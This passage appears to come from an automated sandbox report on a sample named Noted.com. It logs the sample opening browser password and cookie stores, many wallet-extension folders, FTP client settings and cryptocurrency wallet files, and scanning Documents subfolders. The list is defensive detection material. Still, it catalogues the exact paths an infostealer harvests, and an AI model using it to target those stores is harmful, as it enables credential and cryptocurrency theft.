      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
